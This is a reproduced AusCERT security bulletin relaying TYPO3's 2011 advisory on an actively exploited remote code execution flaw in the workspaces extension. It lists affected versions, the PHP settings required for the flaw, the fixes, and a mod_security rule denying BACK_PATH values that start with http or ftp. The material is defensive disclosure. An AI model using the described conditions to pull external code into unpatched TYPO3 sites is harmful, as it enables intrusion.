News & Media
Become a member »
» ESB-2012.0028 - ALERT [Win][UNIX/Linux] TYPO3: Execu...
ESB-2012.0028 - ALERT [Win][UNIX/Linux] TYPO3: Execute arbitrary code/commands - Remote with user interaction
06 January 2012
Click here for printable version
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2012.0028 Remote Code Execution in TYPO3 Core 6 January 2012 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: TYPO3 Publisher: TYPO3 Operating System: Windows UNIX variants (UNIX, Linux, OSX) Impact/Access: Execute Arbitrary Code/Commands -- Remote with User Interaction Resolution: Patch/Upgrade Original Bulletin: http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2011-004/ Comment: Please note this vulnerability is being actively exploited. - --------------------------BEGIN INCLUDED TEXT-------------------- TYPO3 Security Bulletin TYPO3-CORE-SA-2011-004: Remote Code Execution in TYPO3 Core Component Type: TYPO3 Core Affected Versions: 4.5.0 up to 4.5.8, 4.6.0 and 4.6.1 (+ development releases of 4.7 branch) Vulnerability Types: Remote Code Execution Overall Severity: Critical Release Date: December 16, 2011 Vulnerable subcomponent: TYPO3 workspaces Vulnerability Type: Remote Code Execution Severity: Critical Suggested CVSS v2.0: AV:N/AC:M/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C (What's that?) Problem Description: A PHP file which is part of the workspaces system extension does not validate passed arguments. You are only vulnerable if all of the following conditions are met: * You are using TYPO3 version 4.5.0 up to 4.5.8, 4.6.0 or 4.6.1 (+ development releases of 4.7 branch). * You have all of following PHP configuration variables set to "on": register_globals ("off" by default, advised to be "off" in TYPO3 Security Guide), allow_url_include ("off" by default) and allow_url_fopen ("on" by default) If you are using the Suhosin PHP extension you are only vulnerable if you have additionally put URL schemes in the configuration variable "suhosin.executor.include.whitelist". The workspaces system extension does not need to be activated for this vulnerability to exist. Possible Impact: A crafted request to a vulnerable TYPO3 installation will allow an attacker to load PHP code from an external source and to execute it on the TYPO3 installation. Solution: You can choose one of the solutions below: *Update to the TYPO3 version 4.5.9 or 4.6.2 that fix the problem described! *Set at least one of following PHP configuration variables to "off": register_globals, allow_url_include and allow_url_fopen *Apply the patch that is linked below! *Set up a mod_security rule: *SecRule ARGS:BACK_PATH "^(https?|ftp)" "deny" Patch: how to patch Patch for TYPO3 version 4.5.x and 4.6.x (md5 sum: 3779a884b87b93b874b8a21330f43533) Note: We have been informed that this vulnerability has already massively been tried to be exploited. Credits: Credits go to Bjrn Pedersen and Christian Toffolo who discovered and reported the issue and the Security Team member Helmut Hummel for providing the patch. General Advice: Follow the recommendations that are given in the TYPO3 Security Guide. Please subscribe to the typo3-announce mailing list. - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to firstname.lastname@example.org and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: http://www.auscert.org.au/render.html?cid=1980 =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: email@example.com Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBTwZACO4yVqjM2NGpAQJIZA/9HMUodFWJiEBM3TZuzVWZiVjZS26F8MxF mWo6KTE17NL1F2fi+4xuY3vnWZnA+RB+QnKxWfuuzZOj9+TG8v5LvNc+DWYMDLw9 WvVNfzeU9FqbuMrCFAuljyqpnFfuQHf0nPWxmZ84Yl3d+Mrgugm6K8Hep6VbsyKq 5PHXnbrM1iu2UN1fI7Gby7DcwsIsCbj0alV4syr4n6dhSQujeD8K9XqEhOLUABYC tnjHm7GA0VVTHbyood6kgJwlu+7y2avOhQ+ZUvNXNKEoeGevVod8U/UMRKiliOuU Gv//oslUrouEUbbnczamXMRTVwRa6KQmH4DOdAMIRSp5UNkD9RVI/01w2ljhlePU QS9Vwds6SnbT2O+1TOtC8Cix+bvxQoBMGj7C1HCKr9pByeZtQnLYl3ScP6Vqke3z 4nz7AwA1vrUCk5QBZ35AYKXhBxA9+LXZ+5RCO8HUBmI5v5bwhKQSare427/gXFKN HECl6fqqD4gJSNW5BQzkgjEZuPkohn4lRO3TSzce/Hd/4NkB2AOOITeYnrXPzE/q glhA2E7bFg1qFRV37ft00oVER1epYTR40boPfbVQZUgAvbkFDEi6KOGU4JhRWb1l u7COYwzLYTRT6dom0Rsltv+PQkx2xmcLhfnQ+ZnWhQqfsalkS2TqN/mTF3x4kfJf 6zRx7c7YLx4= =3Yvo -----END PGP SIGNATURE-----
Comments? Click here